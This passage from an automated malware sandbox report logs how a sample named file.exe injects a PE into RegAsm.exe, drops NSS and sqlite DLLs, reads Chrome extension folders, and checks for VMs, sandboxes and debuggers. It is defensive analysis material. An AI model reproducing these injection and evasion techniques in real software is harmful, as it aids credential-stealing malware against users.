                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: file.exeStatic file information: File size 1153024 > 1048576
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb source: file.exe
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb% source: file.exe
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177AB GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004177AB
                      Source: file.exeStatic PE information: section name: .00cfg
                      Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                      Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006322E8 push ecx; ret 0_2_00678923
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419335 push ecx; ret 2_2_00419348
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177AB GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004177AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                      Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                      Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 9.7 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.0 %
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 7760Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FD2C GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FE3Fh2_2_0040FD2C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CF963 FindFirstFileExW,0_2_006CF963
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CFE47 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CFE47
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004163B3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004163B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004154FA _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004154FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B4B6 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B4B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409538 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6CD _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C6CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415BC6 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415BC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409FC5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409953 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A9D4 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A9D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415F6A _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415F6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415947 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415947
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FEC8 GetSystemInfo,wsprintfA,2_2_0040FEC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RegAsm.exe, 00000002.00000002.2171551274.0000000003525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2171023727.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-81940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006785BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006785BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177AB GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004177AB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D23FF mov eax, dword ptr fs:[00000030h]0_2_006D23FF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2452 mov eax, dword ptr fs:[00000030h]0_2_006D2452
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D24A5 mov eax, dword ptr fs:[00000030h]0_2_006D24A5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2516 mov eax, dword ptr fs:[00000030h]0_2_006D2516
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D265E mov eax, dword ptr fs:[00000030h]0_2_006D265E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2609 mov eax, dword ptr fs:[00000030h]0_2_006D2609
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D26F0 mov eax, dword ptr fs:[00000030h]0_2_006D26F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D26B3 mov eax, dword ptr fs:[00000030h]0_2_006D26B3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BED17 mov ecx, dword ptr fs:[00000030h]0_2_006BED17
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401000 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,2_2_00401000
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067807F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0067807F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006785BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006785BC
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689365 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00689365
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004194DF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004194DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E598 SetUnhandledExceptionFilter,2_2_0041E598
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041AA07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041AA07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C9DAC62

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00F1018D
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Searches for specific processes (likely to inject)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111A4 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111A4
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
